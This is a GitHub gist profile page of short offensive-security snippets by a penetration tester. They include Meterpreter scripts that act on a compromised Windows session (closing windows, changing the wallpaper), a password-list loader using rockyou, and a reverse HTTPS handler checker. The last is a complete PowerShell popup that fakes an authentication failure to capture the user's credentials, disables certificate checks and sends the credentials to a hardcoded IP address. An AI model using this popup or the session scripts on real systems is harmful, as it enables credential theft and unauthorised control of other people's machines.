Skip to content

Instantly share code, notes, and snippets.

View mubix's full-sized avatar
🎯
Focusing

Rob Fuller mubix

🎯
Focusing
View GitHub Profile
@mubix
mubix / close_minimize.rb
Created December 20, 2013 05:15
Uses the "CloseWindow" API call to minimize all of the windows.
windows = client.extapi.window.enumerate
windows.each do |winder|
result = client.railgun.user32.CloseWindow(winder[:handle])
end
namefile = File.new('other-names.txt', 'r')
passwordfile = File.new('rockyou.txt', 'r')
usercount = 5
names = []
namefile.each_line do |line|
names << line.chomp
end
passwords = []
##
# $Id: $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
#!/usr/bin/env ruby
require 'rubygems'
require 'twitter'
cli = Twitter::REST::Client.new do |config|
config.consumer_key = "..."
config.consumer_secret = "..."
config.access_token = "..."
config.access_token_secret = "..."
end
@mubix
mubix / follow_all.rb
Created January 8, 2014 22:15
Follow All Revision 1
#!/usr/bin/env ruby
require 'rubygems'
require 'twitter'
# You can get the following by creating a "app" here: https://dev.twitter.com/apps
cli = Twitter::REST::Client.new do |config|
config.consumer_key = ""
config.consumer_secret = ""
config.access_token = ""
config.access_token_secret = ""
@mubix
mubix / useproxyresponse.rb
Created January 24, 2014 08:32
Attempting to use a 305 HTTP code
require 'sinatra'
# Notes:
# https://www.youtube.com/watch?v=H9Kxas65f7A @ 5 minutes 20 seconds
# http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html#sec10.3.6
# http://www.askapache.com/htaccess/apache-status-code-headers-errordocument.html#305_Proxy
# http://www.checkupdown.com/status/E305.html
get '/' do
@mubix
mubix / handlercheck.rb
Created October 31, 2016 19:32
Reverse HTTPS Handler Checker
#!/usr/bin/env ruby
require 'net/smtp'
def issue_alert
thetimeitfailed = Time.now
message = <<MESSAGE_END
From: HANDLERCHECKIN <root@metasploithandler>
To: Rob Fuller <mubix@hak5.org>
Subject: Handler Checkin
@mubix
mubix / wallpaper.rb
Created August 19, 2015 07:32
Wallpaper Script from Metasploit Minute
#Change Wallpaper
session = client
key = "HKCU"
wallpaper = "kerby.bmp"
based = "/root/kerby.bmp"
# based = File.join(Msf::Config.install_root, "data", wallpaper)
bgcolor = "0 0 0" # set to 255 255 255 for white
refresh_cmd = "rundll32.exe user32.dll, UpdatePerUserSystemParameters"
@mubix
mubix / brutelist.rb
Created February 20, 2014 04:54
Just charset brute force script
#!/usr/bin/env ruby
#
## Brute code stolen form: https://gist.github.com/petehamilton/4755855
#
def result?(sub)
puts sub
1 == 2
@mubix
mubix / powershellpopup.ps1
Created January 12, 2015 20:22
Powershell Popups, proxy aware and auth aware
$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName + "\" + [Environment]::UserName,[Environment]::UserDomainName);
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
$wc = new-object net.webclient;
$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy;
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;
$wc.credentials = new-object system.net.networkcredential($cred.username, $cred.getnetworkcredential().password, '');
$result = $wc.downloadstring('https://172.16.102.163');